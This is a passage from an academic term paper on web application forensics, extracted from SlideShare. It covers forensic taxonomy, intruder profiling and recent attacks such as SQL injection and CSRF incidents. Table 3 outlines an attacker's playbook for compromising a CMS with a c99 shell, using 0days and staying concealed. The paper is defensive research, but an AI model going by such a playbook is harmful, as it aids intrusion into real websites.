SlideShare una empresa de Scribd logo
1 de 50
Descargar para leer sin conexión
Web Application Forensics
                  Taxonomy and Trends

                            term paper


                        Krassen Deltchev
                   Krassen.Deltchev@rub.de


                       5. September 2011




                  Ruhr-University of Bochum
Department of Electrical Engineering and Information Technology
              Chair of Network and Data Security
                       Horst Görtz Institute


     First examiner:                       Prof. Jörg Schwenk
     Second Examiner and Supervisor:       M.Sc. Dominik Birk
Contents
 List of Figures .................................................................................................................................. 3
 List of Tables ................................................................................................................................... 3
 Abbreviations ................................................................................................................................... 4
 Abstract ............................................................................................................................................ 5
1. Introduction .................................................................................................................................. 7
   1.1. What is Web Application Forensics? .................................................................................... 7
   1.2. Limitations of this paper ....................................................................................................... 8
   1.3. Reference works ................................................................................................................... 9
2. Intruder profiles and Web Attacking Scenarios .......................................................................... 11
   2.1. Intruder profiling ................................................................................................................. 12
   2.2. Current Web Attacking scenarios ........................................................................................ 14
   2.3. New Trends in Web Attacking deployment and preventions .............................................. 15
3. Web Application Forensics ......................................................................................................... 19
   3.1. Examples of Webapp Forensics techniques ........................................................................ 23
   3.2. WebMail Forensics ............................................................................................................. 25
   3.3. Supportive Forensics ........................................................................................................... 27
4. Webapp Forensics tools .............................................................................................................. 29
   4.1. Requirements for Webapp forensics tools .......................................................................... 29
   4.2. Proprietary tools .................................................................................................................. 31
   4.3. Open Source tools ............................................................................................................... 34
5. Future work ................................................................................................................................ 39
6. Conclusion .................................................................................................................................. 41
 Appendixes .................................................................................................................................... 42
 Appendix A .................................................................................................................................... 42
 Application Flow Analysis ............................................................................................................ 42
 WAFO victim environment preparedness ...................................................................................... 44
 Appendix B .................................................................................................................................... 45
 Proprietary WAFO tools ................................................................................................................ 45
 Open Source WAFO tools ............................................................................................................. 48
 Results of the tool's comparison .................................................................................................... 49
 List of links .................................................................................................................................... 50
 Bibliography .................................................................................................................................. 52




                                                                           2
List of Figures
Figure 1: General Digital Forensics Classification, WAFO allocation ............................................. 8
Figure 2: Web attacking scenario taxonomic construction .............................................................. 15
Figure 3: Digital Forensics: General taxonomy .............................................................................. 20
Figure 4: WAFO phases, in Jess Garcia[1] ...................................................................................... 21
Figure 5: Extraneous White Space on Request Line, in [3] ............................................................ 23
Figure 6: Google Dorks example, in [3] .......................................................................................... 24
Figure 7: Malicious queries at Google search by spammers, in [3] ................................................ 24
Figure 8: faked Referrer URL by spammers, in [3] ......................................................................... 24
Figure 9: RFI, pulling c99 shell, in [3] ............................................................................................ 24
Figure 10: Simple Classic SQLIA, in [3] ........................................................................................ 25
Figure 11: NBO evidence in Webapp log, in [3] ............................................................................. 25
Figure 12: HTML representation of spam-mail( e-mail spoofing) .................................................. 26
Figure 13: e-mail header snippet of the spam-mail in Figure 12 .................................................... 26
Figure 14: Spam-assassin sanitized malicious HTML redirection, from example Figure 12 ......... 27
Figure 15: Main PyFlag data flow, as [L26] .................................................................................... 35
Figure 16: Improving the Testing process of Web Application Scanners, Rafal Los [10] .............. 43
Figure 17: Flow based Threat Analysis, Example, Rafal Los [10] .................................................. 43
Figure 18: Forensics Readiness, in Jess Garcia [13] ....................................................................... 44
Figure 19: MS LogParser general flow, as [L16] ............................................................................ 45
Figure 20: LogParser-scripting example, as [L17] .......................................................................... 45
Figure 21: Splunk licenses' features ................................................................................................ 46
Figure 22: Splunk, Windows Management Instrumentation and MSA( ISA) queries, at WWW .. 47
Figure 23: PyFlag- load preset and log file output, at WWW ......................................................... 48
Figure 24: apache-scalp or Scalp! log file output( XSS query), as [L25] ....................................... 48




List of Tables
Table 1: Abbreviations ....................................................................................................................... 4
Table 2: A proposal for general taxonomic approach, considering the complete WAFO description ...
11
Table 3: Example of possible Webapp attacking scenario ............................................................... 16
Table 4: Standard vs. Intelligent Web intruder ................................................................................ 17
Table 5: Web Application Forensics Overview, in [15] ................................................................... 21
Table 6: A general Taxonomy of the Forensics evidence, in [1] ..................................................... 22
Table 7: Common Players in Layer 7 Communication, in Jess Garcia [1] ..................................... 22
Table 8: Traditional vs. Reactive forensics Approaches, in [13] ..................................................... 29
Table 9: Functional vs. Security testing, Rafal Los [10] ................................................................. 42
Table 10: Standards & Specifications of EFBs, Rafal Los [10] ...................................................... 42
Table 11: Basic EFD Concepts [10] ................................................................................................ 42
Table 12: Definition of Execution Flow Action and Action Types, Rafal Los [10] ........................ 42
Table 13: TRR completion on LogParser, Splunk, PyFlag, Scalp! ................................................. 49
Table 14: List of links ...................................................................................................................... 51




                                                                       3
Abbreviations
Anti-Virus                          AV
Application-Flow Analysis           AFA
Business-to-Business                B2B
Cloud-computing                     CC
Cloud(-computing) Forensics         CCFO
Digital Forensics                   DFO
Digital Image Forensics             DIFO
Execution-Flow-Based approach       EFB
Incident Response                   IR
Microsoft                           MS
Network Forensics                   NFO
Non- persistent XSS                 NP-XSS
NULL-Byte-Injection                 NBI
Operating System(s)                 OS(es)
Operating System(s) forensics       OSFO
Persistent( stored) XSS             P-XSS
Proof of Concept                    PoC
Regular Expression                  RegEx
Relational Database System          RDBMS
Remote File Inclusion               RFI
SQL Injection Attacks               SQLIA
Tool's requirements rules           TRR
Web Application Firewall(s)         WAF(s)
Web Application Forensics           WAFO
Web Application Scanner             WAS
Web Attacking Scenario(s)           WASC
Web Services Forensics              WSFO
Table 1: Abbreviations




                                4
Abstract

The topic, covering Web Application Forensics is challenging. There are not enough references,
discussing this subject, especially in the Scientific communities. Often is the the term 'Web
Application Forensics' misunderstood and mixed with IDS/ IPS defensive security approaches.
Another issue is to discern the Web Application Forensics, short Webapp Forensics, from Network
Forensics and Web Services Forensics, and in general to allocate it in the Digital/ Computer
Forensics classification.
Nowadays, Web Platforms are vastly growing, not to mention the so called Web 2.0 hype.
Furthermore, Business Web Applications blast the common security knowledge and premise rapid
inventory of the current security best practices and approaches. The questions, concerning the
automation of the security defensive and investigation methods, are becoming undeniable
important.
In this paper we should try to dispute the questions, concerning taxonomic approaches regarding the
Webapp Forensics; discuss trends, referenced to this topic and debate the matter of automation tools
for Webapp forensics.




Keywords
Web Application Security, WebMail Security, Web Application Forensics, WebMail
Forensics, Header Inspection, Plan Cache Inspection, Forensic Tools, Forensics
Taxonomy, Forensics Trends




                                                 5
1.Introduction


1. Introduction

In [1], Jess Garcia gives a definition of the term 'Forensics Readiness':
“ Forensics Readiness is the “art” of Maximizing an Environment's Ability to collect Credible
Digital Evidence”. This statement we should keep in mind in the further exposition of the paper. It
points out several important aspects. Foremost, forensics rely on maximal collection of digital
evidence. If the observed environment1 is not well prepared for forensic investigation, discovering
the root, for the system is been attacked, could be: sophisticated, not efficient in time and even non
deterministic in finding an appropriate remediation of the problem.
Another essential aspect of Forensics, as Jess Garcia, is- the forensic investigation is an art.
It is obvious to point out furthermore that, defining best practices, concerning the proper
deployment of forensic work, is unbefitting. An intelligent intruder will always find drawbacks in
such best-practice scenarios and try to exploit them as well to accomplish new attacks, complete
them successfully and remain concealed.
In this way of thoughts, appears the question, how can we suggest taxonomy, regarding forensic
work, if we are aware a priori of the risks such recipes include?
We shall propose several general intruders' strategies and profiling of the modern Web attacker in
the paper, keeping in mind not to hurt the universal validity of the statements we discuss. In some
cases we shall give examples and paradigms through references, though only for the matter of the
good illustration of the statements in the current thesis.
Let us describe more precisely the matters, concerning the Webapp Forensics in the next section.

1.1. What is Web Application Forensics?

Web Application Forensics( WAFO) is a post mortem investigation of a compromised Web
Application( Webapp) system. WAFO consider especially attacks on Layer 7 of the ISO/OSI model.
In distinction to this, capturing and filtering of internet protocols on-the-fly is not a concern of the
Webapp forensics. More precisely, such issues in general are in the focus of Network
Forensics( NFO). Nevertheless, examining the log files of such automated tools( IDS/ IPS/ traffic
filters/ WAF etc.) is supportive for the right deployment of the Webapp forensic investigation.
As stated above, NFO examine in concrete such issues, that's why we should like to discern Webapp
Forensics from it, keeping in mind the supportive function, which Network forensic tools can
supply to WAFO.
Consequently, we should like to specifically allocate WAFO in the Digital Forensics( DFO)
structure, because some main topics in DFO are not implicitly referred to Layer 7 of the ISO/OSI
Model. Such should be designated as follows: Memory Investigations, Operating Systems Forensics
investigations, Secure Data Recovery on physical storage of OSes etc. Nevertheless, DFO consider
investigations of image manipulations [L1], [L2], which in some cases could be also very
supportive for the proper deployment of WAFO.
At last, we should categorize WAFO as a sub-class of Cloud Forensics( CCFO) [2]. Cloud
1 we assume that, the reader understands the abstraction of the Webapp as a WAFO environment

                                                       7
1.Introduction

Forensics is a relatively new term in the Security communities. Historically, the existence of Web
Applications lead in phase to the Cloud-Computing( CC). Concerning the complexity of the Web
applications, platforms and services presented by the CC, CCFO cover larger investigation areas
than the WAFO. As an example, WAFO is not explicitly observing fraud on Web Services. Web
Services are covered by the Web Services Forensics( WSFO), another sub-class of CCFO, and
should be categorical discerned from WAFO, please read further.
Let us illustrate the DFO taxonomic structure in the next Figure:




Figure 1: General Digital Forensics Classification, WAFO allocation

On behalf of this short introduction of the different Computer Forensics categories, let's designate
explicitly the limitations of the paper. This concerns the better understanding of the paper's
exposition and explain the absence of examples, covering different exotic attacking scenarios.

1.2. Limitations of this paper

This term paper discusses Web Application Forensics, which excludes topics as on-the-fly packet
capturing, packet inspection of sensitive data over ( security) internet protocols. Once again to
mention, it does not cover attacks, or attacking scenarios on lower layer than Layer 7 ISO/ OSI
Model. For the interested reader, a very good correlation of the Layer 7 Attacks and below,
concerning Web Application Security and Forensics can be found at [3]. In distinction to Web
Services Forensics [5] and CCFO [2], the presented paper covers only a small topic, concerning the
varieties of fraud Web Applications:
    •   RIA( AJAX, RoR2, Flash, Silverlight et al.) ,


2 RoR- Ruby on Rails, http://rubyonrails.org/

                                                  8
1.Introduction

    •     static Web Applications,
    •     dynamic Web Applications and Web Content( .asp(x), .php, .do etc. ),
    •     other Web Implementations( like different CMSes), excluding research on fraud, concerning
          Web Services Security, or CC Implementations, but explicitly Web Applications.
Due to the marginal limitations of the term paper, the reader shall find a couple of illustrating
examples, which do not pretend to cover the variety of illustrative scenarios of Web Attacking
Techniques and Web Application Forensics approaches.
For the reader concerned, attacks on Layer 7 are introduced and some of them discussed in detail
at [4].
Furthermore, we should denote a clarification, regarding the references in this paper, considering
their proper uniformity, as follows. General knowledge should be referenced by footnotes at the
appropriate position. The scientifically approved works are indexed at the end of the paper in the
Bibliography, as ordinary. Non scientifically approved works, also video-tutorials, live video
snapshots of conferences, blogs etc. are indexed by the List of links after the Appendix of this paper.
We should imply this strict references' sources division, with respect to the Security Scientific
Communities. In addition to this, let us introduce some of the interesting related works dedicated
on the topic of WAFO.

1.3. Reference works

An extensive approach, covering the different aspects of Web Application Forensics, is given in the
book “Detecting Malice” [3], by Robert Hansen3. The interested reader can find much more than
just WAFO discussions in this book, but in addition to these also examples of attacks on lower level
than Layer 7, correlated to the WAFO investigations and many paradigms, derived from real-life
WAFO investigations.
The unprepared reader should notice that, the topics in the book, discussing WAFO tools, are
limited. The author of the book points out the sentence, that every WAFO investigation should be
considered as unique, especially in its tactical accomplishment, therefore favoring of top automated
tools, should be assumed as inappropriate, please read further.
Another interesting approach is given by SANS Institute as Practical Assignment, covering three
notable topics: penetration testing of a compromised Linux System, a post mortem WAFO on the
observed environment and discussions on the legal aspects of the Forensics investigation [6].
Despite the fact that, this tutorial in its Version 1.4 is no more relying on an up-to-date example, it
illustrates very important basics, concerning WAFO and can be used still as a fundamental reading
for further research on the WAFO topic.
BSI4, Germany, describes in the Section, Forensic Toolkits, at “Leitfaden “IT-Forensik” [7], Version
1.0, September 2010, different Forensic tools for automated analysis, many of them concerning
implicitly WAFO. The toolkits are compared by the following aspects:
    •     analyzing of log-data,

3 http://www.sectheory.com/bio.htm
4 https://www.bsi.bund.de/EN/Home/home_node.html

                                                   9
1.Introduction

   •   tests, concerning time consistency,
   •   tests, concerning syntax consistency,
   •   tests, concerning semantic consistency,
   •   log-data reduction,
   •   log-data correlation, concerning integration and combining of different log-data sources in a
       consistent timeline, integration/ combining of events to super-events,
   •   detection of timing correlations( MAC timings) between events.
The given approaches can be related to WAFO log file analysis, which designates them as
reasonable supportive WAFO investigation methods.
Another tutorial, giving basic overview, which should be also considered as fundamental regarding
WAFO research, is: “Web Application Forensics: The Uncharted Territory”, presented at [8].
Although, the paper is published in 2002, it should not be categorized it in a speedy manner as
obsolete.
Other papers, articles and presentation papers, concerning specific WAFO aspects, complete the
group of the related references, concerning the Web Application Forensics research in this term
paper. These should be referenced at the appropriate paragraphs in the paper's exposition and not be
discussed individually in this section, furthermore.
Let's describe the structure of the term paper. Chapter 2 should give a taxonomic illustration on the
topics, designating intruders' profiling and modern Web Attacking Scenarios. Chapter 3 deliberates
WAFO investigation methods and techniques more detailed and concerns further discussion on the
matter of signification of a possible WAFO taxonomy. In Chapter 4 are illustrated the WAFO
investigation supportive tools. An important section outlines the questions, concerning the
requirements of WAFO toolkits, which points out the reasonable aspects for determining the tools
either as relevant, or inappropriate for adequate WAFO investigations. Two major group of favorite
tools should be designated: Proprietary Toolkits and Open Source solutions. Chapter 5 represents
the final discussion on the paper's thesis and suggestions for future work on behalf of the discussed
topics in the former chapters. In Chapter 6 is deliberated the Conclusion on the proposed thesis.
The Appendix demonstrates an additional information( tables, diagrams, screenshots and code
snippets) on specific topics, discussed in the exposition part of the paper.
Let us proceed with the description of the Web Attacking Scenarios and ( Web) Intruder profiles.




                                                 10
2.Intruder profiles and Web Attacking Scenarios


2. Intruder profiles and Web Attacking Scenarios

In the introduction part of this thesis is outlined that, the scientifically approved research,
concerning Web Application Forensics by the Security and Scientific Communities, should be still
considered as insufficient and as not well-established. That's why, an appropriate categorization of
the different Forensic Fields and the correct allocation of WAFO in the Digital Forensics hierarchy
are adequately appointed as required in the former chapter, which satisfies one of the objectives of
the current paper.
For all that, this classification does not present a complete fundamental basis for further academic
research on WAFO. Therefore, we should extend the abstract Model, concerning WAFO, by
introducing two other fundamentals: the profile of the modern Web intruder and methodologies as
abstract schemae, current Cyber ( Web) attacks are accomplished by.
Thus, we should follow the proposed schema for describing completely the aspects of WAFO, see
the following Table:
    1. represent the Digital Forensics hierarchy and
    2. allocate the field of interest, concerning WAFO,
    3. explain the Security Model, WAFO is observing, by:
             •   designating the intruder,
             •   describing the victim environment( Webapps),
             •   specifying the fraudulent methods;
    4. demonstrate the WAFO tasks, supporting the security remediation plan

Table 2: A proposal for general taxonomic approach, considering the complete WAFO description


In this way of thoughts, we should stress that, the intruders' attacks on existing Web Applications
and other Web Implementations nowadays, should be denoted as highly sophisticated. Such Web
attacks are rapidly adaptive in their variations and alternations, and in some cases precarious to be
effectively sanitized. Example of such attacks like CSRF, Compounded SQLIA and Compounded
CSRF are described in [4]. A good representative in this group is the famous Sammy worm, which
is still wrongly considered to be a pure XSS Attack. Another confusing example demonstrate the
Third Wave of XSS Attacks, DOM based XSS( DOMXSS) [20]. The fact that, DOMXSS attacks
cannot be detected by IDS/ IPS, or WAF systems, if the payload is obfuscated as an URL
parameter, e.g. Web Application server do not record HTML parameters in the log file, but only the
primary URL prefix, should be designated as ominous. If the nature of such Attacking scenarios is
fundamentally mistaken, then it is a matter of time that, attacks' derivatives should success in their
further fraudulent activities on the Web.
The task to sanitize a compromised Web application by CSRF is very difficult. It requires immense
efforts of Reverse Engineering and Source Code rectification in reasonable boundaries for time and
efficiency. The more general problem is, Web Applications are per se not stealth5. Thus, hardening a

5 Exceptions to these could be Intranet-Webapps, which designate another class of Webapps, concerning the term

                                                        11
2.Intruder profiles and Web Attacking Scenarios

Webapp is not equivalent to hardening of a local host. In other words, the utilization of known
preventive techniques, like security-through-obscurity, should be anted to secured Intranet Web
applications, Admin Web Interfaces, non-public FTP servers etc., but commercial B2B Webapps,
On-line Banking, Social Network Web sites, On-line magazines, WebMail applications and others.
These last mentioned applications are meant to be employed from all over the world per definition;
they exist, because of the huge amount of their users and customers per se. That's why, the securing
of such Web constructs is more complex and intensive. Of course, there are basic and advanced
authentication techniques applied to Web implementations, though these do not make the Webapp
stealth for intruders. They just apply the so called user restriction for using sensitive parts of the
Web implementation. In this way of thoughts, pointing out exaggerative cases of Web fraud like
Child pornography and personal image offending issues, is only the top of the iceberg of examples
for Web crime. The problem is, nowadays Identity Theft and speculations with sensitive personal
data, should not be further categorized as exotic examples of existing Cyber crimes6 over the
internet on Web Platforms. Such crimes designate an everyday persistence. Social networks, social
and health insurance companies strive for more impressive Web representation. E-Commerce
Platforms for daily monetary transactions are undeniable nowadays. We should not consider
nowadays Web 2.0 as a hype, we should keep in mind that, the former dynamic E-commerce Web
representations become nowadays sophisticated RIA Web platforms. Such Webapps respect the
better marketing representation of the Business Logic of the firms, which profit depends at the
present days on the complexity, rapidly changing dynamic adaption and more user-friendly features
for satisfying the Web customer at any time. These aspects explain the huge intruders' interest for
compromising Web applications, and furthermore Web Services as well. There is no kind of
deterministic conclusions on the prediction of Web Attacking Scenarios, or the amount of the
damage they cause every day.
In [3], Robert Hansen compares the intensity of Web Attacks' representations and amount of
damage they cause comparatively to the computer viruses. Both of the security topics should not
loose attention of the Security communities for a long period of time. Moreover, as already stated,
their remediation could not be ascertained straight-forward. As we know, there is no default
approach for proper sanitization against computer viruses. The same statement is applicable for
Webapp attacking scenarios. Rather, it is a matter of extensive 24/7/365 deployment of proper
security hardening techniques and strategies, and the adaptive improvement of those. Knowing your
friends is good, knowing your enemies is crucial. Let's proceed in this way of thoughts, after giving
this conclusive explanation for the motivational purpose of the paper, with the representation of
modern Web fraud in detail as follows.

2.1. Intruder profiling

Two general categories should be designated in this section: the standard intruder profile and the
profile of the intelligent intruder, performing terrible Cyber crime, short- intelligent intruder profile.
We should use the adjective 'intelligent', describing the second intruder's profile, as very reasonable,
respecting the fact- if we as representatives of the Security Communities, pretend to posses
knowledge and know-how, concerning the proper deployment of our duties, this kind of intruders
posses it too and much more.

  paper's definitions, where extensive intruder's effort is a pre-requirement for breaking the Intranet security, and
  should not be discussed here as relevant.
6 http://www.justice.gov/criminal/cybercrime/

                                                            12
2.Intruder profiles and Web Attacking Scenarios

There are also fuzzy definitions of intruders, which designate states in between the above
mentioned ones. In fact, these profiles are very agile in their representation. For example- a 'former'
intelligent intruder should be categorized better as a latent one, and a motivated standard attacker
should not be disrespected. This violator could fulfill the requirements of the category, related to the
intelligent intruder profile, at any time with sufficient likelihood.
In the category of standard intruder we should determine: script kiddies and hacker wannabes,
“fans” of YouTube, or other video platforms, capturing knowledge and know-how from easy how-to
video tutorials. Bad configured robots and spiders, and any other kind of not well educated, not
enough motivated, even not enough skilled daily violators. Specific for this group of intruders is the
lack of personal knowledge and know-how, utilization of well known attacking techniques and
scenarios well-established on the Web. Such violators are ignorant to and disrespecting the noise7
they produce, while trying to accomplish the attacks. These features explain the deduction- a
standard attacking scenario, could be sanitized in greater likelihood with standard prevention and
hardening techniques( best-practices). In cases of successfully deployed attack(s) on behalf of such
standard scenarios, the investigation and detection approaches could be considered as standard with
greater likelihood too.
For all that, there are cases, which represent attacking scenarios, designated as shadow scenarios. It
is not important, whether these are accomplished successfully, or not at the specific time of the
attack's deployment. Their utilization is to cover the deployment of the real attacking scenario.
That's why, we should rather concern, whether these are cases of intelligent intruders' attacks.
The group of intelligent intruders should deliberate: 'former' ethical hackers; pen testers; security
professionals, who have changed sides, disrespecting their duties; intelligently set up automated
tools for Web Intrusion, such as Web Scanners, Web Crawlers, Robots, Spiders etc.
The most notable feature describing these representatives is the possession of inferior independent
knowledge and know-how. Furthermore, patience, accuracy in the accomplishment of the attacking
scenario deployment, strive to learn and assimilate new know-how.
Interesting examples, related to this profile, are given at [3]. We should mention some types of such
ones. Intelligent hackers are recruited by law firms to achieve a Proof of Concept( PoC) on a
targeted Web implementation. If the PoC is positive, this could alter the outcome of the legal case,
as this PoC could be used as decisive juristic evidence in most of the situations in account of the
hacker recruiting law firm. Such intruders' attacks are difficult to be detected right on time.
Furthermore, there are other cases, where the damage of the accomplished attack is the determinant
alarm after havoc is consequently presented. As already stated, the sanitization of the compromised
Web Application(s) after such successful attacks is in some cases unfeasible and more often requires
sophisticated methods to be achieved. Examples of these are CSRF compromised Webapps, like the
case: PDP GMail CSRF attack8, see also [4]. Therefore, reasonable supportive part to the accurate
sanitization of the compromised Webapp, demonstrates the proper deployment of Web Application
Forensics investigations.
Let's mention several examples of modern Web Attacking Scenarios in the next section of
Chapter 2.

7 We should emphasize here: the Communication Complexity and amount of false positive attempts by the violator(s)
  in their strive to complete the intended Web attacking scenario(s), which should not be mistaken with the utilization
  of attacking techniques, where producing communication noise is the core of the attacking strategy, like different
  DDoS implementations: Fast Fluxing SQLIA, DDoS via XSS, DDoS via XSS with CSRF etc.
8 http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/

                                                          13
2.Intruder profiles and Web Attacking Scenarios

2.2. Current Web Attacking scenarios

In May, 2009 Joe McCray9 concludes in his presentation [9] on 'Advanced SQL Injection' at
LayerOne10, that Classic SQLIA should no more be categorized as a trend or conventional.
In [4] Classic SQLIA are discussed as a part of the current SQLIA taxonomy till 2010. Despite the
fact, their categorization by Joe McCray should be respected as reasonable. This controversial issue
is presented at many of the current Web Attacking Vectors. To achieve a complete taxonomic
approach, pertaining to a concrete Webapp Attacking vector, many obsolete representations of the
Attacking sub-classes should be illustrated, revering the real Web Environment. The mentioned
above Classic SQLIA illustrate obsolete and more over unfeasible Attacking Techniques,
considering the properly employed modern defensive methods. The main reason, explaining this
issue is- Web platforms are vastly changing, not only according to its development aspects, but
rather the attacking and security hardening scenarios, anted to them. Most likely, an intelligent
intruder should not use obsolete techniques, because of the expectant presence of Web Application
security protection. Detecting deployment of obsolete Attacking Scenarios on a modern Web
construct, could be classified as an investigation on the standard intruder's profile. Nevertheless,
this conclusion should not be underestimated, as previously discussed, see shadow scenarios.
Let's give some interesting examples of current successful accomplished Web Attacks.
In July, 2009 a dynamic CSRF Attack is accomplished on the Web Platform of Newsweek [4], [L4].
The Tool, called MonkeyFist11, utilized for this first completely automated CSRF Attack, represents
a Python- based small web server, configured via XML. The victim site is been already hardened
via protecting of the generation of its dynamic elements by security tokens12 and strong session IDS.
For all that, this new attacking technique achieves positive results, which designates open questions,
concerning the impact of the 'See surfing' sleeping giant.
Another recent attack is the SQLIA over the British Navy Website[L5] in November, 2010, which
was only meant to be a PoC by a Romanian hacker, that Web Application Security can be broken
even at such high-level hardened Web Implementations.
In April 2011, different mass infection by SQLIA is detected. 28000 Web sites are compromised,
even several Apple Itunes Store index sites are infected. The SQLIA injects a PHP script, which
redirects the user to a cross-origin phishing site, pretending to deliver an on-line Anti-Virus( AV)
protection. The attack is known in the Security Communities as LizaMoon Mass SQLIA13 [L6].
The list of such impressive Web Attacking incidents can be proceeded, which should not be
enumerated further in the paper. The interested reader should refer further to :
     •   The Web Hacking Incidents Database14
     •   OWASP Top Ten Project15


9  http://www.linkedin.com/in/joemccray
10 LayerOne- IT- Security conference, http://layerone.info
11 http://www.neohaxor.org/2009/08/12/monkeyfist-fu-the-intro/
12 The anti-CSRF token is originally suggested by Thomas Schreiber, in 2004:
   www.securenet.de/papers/Session_Riding.pdf
13 http://blogs.mcafee.com/mcafee-labs/lizamoon-the-latest-sql-injection-attack
14 http://projects.webappsec.org/w/page/13246995/Web-Hacking-Incident-Database
15 http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

                                                      14
2.Intruder profiles and Web Attacking Scenarios

At the end of this Chapter let's deliberate some interesting trends, concerning the current Web
Attacks.

2.3. New Trends in Web Attacking deployment and preventions

Discussing the deployment of Web Attacks, we should consider a more realistic approach, for
categorizing Web Attacking Vectors. As mentioned above, there are two general profiles of the Web
Intruders. Keeping in mind, the differences of the Attacks' deployment and the level of Attacks'
sophistication, it should be more appropriate to discuss the accomplishment of Web Attacking
Scenarios, rather than the deployment of Web Application Attacks. In such Attacking Scenarios,
which represent a fundamental construct, the Web Attacks should be denoted as execution
techniques in a given attacking setting. This allows us to define single layer attacks, multi-layer
attacks, and special attacking sequences as specific implementations in the realization of the Web
Attacking Scenario. Such scenarios can adequately illustrate the intention of the different profiles of
Web Intruders. In distinction to the intelligent Web Intruder, the standard Intruder tries to
accomplish a simple attacking scenario, reduced to the utilization of a special Web attacking
technique. The Web attacking scenario represents a simple deployment construct: try a well-
established attacking procedure(s) and wait for result(s), no matter what.
As mentioned above, the intelligent Intruder utilizes more sophisticated scenarios. Some of them
could be planned and sequentially accomplished in a long period of time, till achieving the expected
result(s). There are cases in which the intelligent attacker could gain enough feedback from the
victim application and thus intentionally reduce the attacking scenario to the deployment of one or a
compact amount of attacking techniques, which resembles the scenario to the level of the standard
intruder's scenario. Nevertheless, important aspects like utilization of non-standard attacking
techniques and less noise at the attacking environment obviously discern the one profile from the
another. These conclusions should be extended in the Chapters, concerning the more detailed
representation of WAFO.
Let's illustrate the Web Application Scenario construction in the next Figure:




Figure 2: Web attacking scenario taxonomic construction



                                                  15
2.Intruder profiles and Web Attacking Scenarios

The proposed construct should be extended in the next Table, which denotes an example of a
possible Web attacking scenario:
   Example                                          Attack on well-known CMS
                                           [inject c99 shell on the CMS, as a paradigm]
   Scenario          •      What is the particular goal: PoC, ID Theft, destroying Personal Image etc.
                     •      determine the CMS version,
                     •      determine the technical implementation type: concurrent attacking, or sequentially attacking
                            of specific Webapp modules
                     •      localize the modules to be compromised: Web Front-end, RDBMS, WebMail interface,
                            News feeder etc.
                     •      if CMS version obsolete:
                                 • find published exploits( at best 0days16) and utilize them to gather feedback from
                                      the victim environment
                                 • respect scanning noise as low as possible
                     •      if version is up-to-date utilize:
                                 • blind application scanning techniques with noise reduction and wait for positive
                                      feedback
                                 • analyze the results and proceed with further more specific attacking techniques
                     •      if success, utilize a refinement of the attack and if of interest, wait for CMS admins reaction-
                            gives feedback on sanitization response time, efforts, utilized hardening techniques etc.
                     •      if not successful:
                                 • audit the gathered feedback
                                 • wait for new published 0day exploits
                                 • develop a 0day(s) independently
                     •      utilize an scenario sequence execution loop till achieving the goal with respect to:
                                 • ( communication) attacking noise
                                 • and...try to stay concealed
Technique(s) XSS:        SQLIA:                     CSRF            CSFU        Particular        ...    Common well-
(these should * NP-XSS17 * error                                                 0day(s)                  established
be ordered, or    * P-XSS         response                                                                    like:
reordered                         * timing                                                               sniffing for open
according the                     SQLIA ...                                                              admin debugging
attacking                                                                                                console access on
scenario)                                                                                                   port 1099
 Procedures NP-XSS:                                                     Error response SQLIA:                    ...
 ( these should • detect dynamic modules on the Webapp,                    • Step 1,
 be ordered, or      •      find variables to be compromised,              • Step 2,
  reordered as       •      craft the malicious GET- Request and
  appropriate)              taint the input value of the variable to be    • …
                            exploited                                      • Step n;
                     •      gather feedback
                     •      resemble the procedure till expected
                            results are achieved
                     •      spread the malicious link to as many as
                            possible 'Confused Deputies'[4]


Table 3: Example of possible Webapp attacking scenario


16 http://netsecurity.about.com/od/newsandeditorial1/a/aazeroday.htm
17 NP- XSS denotes non-persistent XSS; P-XSS abbreviates the Persistent XSS

                                                             16
2.Intruder profiles and Web Attacking Scenarios

How this respects the proposed profiles of modern Web intruders, should be illustrated as:
           Profile                         Standard Intruder                           Intelligent Intruder
   Attacking Scenario                          static:                           highly dynamically adaptive18
       execution                 remains on the level of published
                                 and well-established 'Web attacks'
        Techniques                           static:               could remain static, but preferably
                               (as a comment: … better watch it on the Cyber criminal would adapt
                                       YouTube19, see [4])              according the successful
                                                                      completion of the Attacking
                                                                               Scenario
        Procedures                                static:                     Could be static, but preferably the
                                       “... just copy and pase”,              Intruder should seek for a 0day(s)
                                      0day with less likelihood
Table 4: Standard vs. Intelligent Web intruder


Another important aspect, respecting the prevention and sanitization of successfully deployed Web
Application Attacking Scenarios, is illustrated by Rafal Los20 in his presentation at OWASP
AppSecDC in October, 2010 [10]. Main topic of his research, concerns the Execution-Flow-Based
approach as a supportive technique to the Web Application security (pen-)testing. The utilization of
Web Application scanners( WAS) should be determined as impressive, supporting the pen-testing
job of the security professional/ ethical hacker and not to forget the intelligent intruder [11], [4].
Indeed, WAS can effectively map the attacking surface of the Webapp, intended to be compromised.
Still, open questions remain, like- do WAS provide full Webapp function- and data-flow coverage,
which reports greater feedback, concerning a complete security auditing of the Web construct in
detail. Most of the pen-testers/ ethical hackers, do not care what kind of functions, related to the
Webapp, should be tested. If they do not exactly know the functional structure and the data-flow of
the Web Application, how should they consider appropriate and complete functional coverage
during the pen-testing of the Webapp?
The job of the pen-tester is to reveal exploits and drawbacks in the realization of a Web Application
prior to the intelligent intruder. Consequently to this, appears the next question, what are the
objective parameters to designate the pen-testing job completed and well-done?
As Rafal Los states, nowadays the pen-testing of Webapps, utilizing WAS, should be still digested
as “point'n'scan web application security”. The security researcher suggests in his presentation that,
a more reasonable Webapp hardening approach is the combination of the Application
function-/data-flow analysis with the consequent security scanning of the observed Web
implementation. A valuable comparison between the Rafal Los' indicated approach and the common
security testing of Webapp(s), outlining the drawbacks of the second one, is given in
Table 9, Appendix A.

18 Respecting the current level of sanitization know-how, produced attacking noise, reactions of the security
   professionals to sanitize the particular Webapp, the specific goal for compromising the victim Webapp
19 The author of the paper do not intend to be offensive to YouTube, nevertheless the facts are: this video on-line
   platform is well-established and popular, there are tons of videos, hosted on it, concerning: Classic SQLIA
   derivatives, XSS derivatives etc., which could be easily found and utilized by script kiddies, hacker wannabes ...
20 http://preachsecurity.blogspot.com/

                                                           17
2.Intruder profiles and Web Attacking Scenarios

Let's summarize these drawbacks, as follows. The current Webapp pen-testing approaches via
scanning tools do not deliver adequate functional coverage of modern and dynamic high
sophisticated Web Applications. Furthermore, the Business Logic of the Webapp(s) is often
underestimated as a requirement for the proper pen-testing utilization. A complete coverage of the
functional mapping of the Web Application could still not be approved. If the application execution
flow is not explicitly conversant, the questions, regarding completeness and validity of the results
from the tested data, should be denoted as open.
Therefore, Rafal Los suggests, utilization of Application-Flow Analysis( AFA) in the preparation
